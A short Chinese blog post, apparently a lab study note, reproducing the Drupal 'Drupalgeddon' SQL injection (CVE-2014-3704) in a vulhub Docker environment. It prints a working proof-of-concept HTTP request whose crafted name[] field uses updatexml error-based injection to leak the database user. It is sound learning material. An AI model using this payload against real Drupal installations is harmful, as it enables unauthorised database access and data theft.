CVE-2014-3704
2019-08-05 本文已影响5人
3mi1e
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
1.漏洞影响版本
Drupal < 7.32
2.漏洞危害
SQL注入
3.漏洞POC
cd /root/vulhub/drupal/CVE-2014-3704 //进入本次复现的漏洞目录
docker-compose up -d //docker-compose搭建环境
Drupal设置环境启动后,访问http://your-ip:8080即可看到Drupal的安装页面,使用默认配置安装即可。
其中,Mysql数据库名填写drupal,数据库用户名、密码为root,地址为mysql:
首页安装完成后,访问首页:
发送如下数据包即可爆出user
POST /?q=node&destination=node HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a
报错注入
4.复盘
漏洞出现原因
未对SQL语句进行严格过滤
总结
1.sql注入处:name[0 or updatexml(0,concat(0xa,user()),0)%23]
2.sqlmap跑不出来,看了一些文章,打算之后做一些updatexml的ctf题,自己试着写sqlmap的脚本。(自信的flag,相信这不会远,最近有些忙,但是依旧会保持更新。)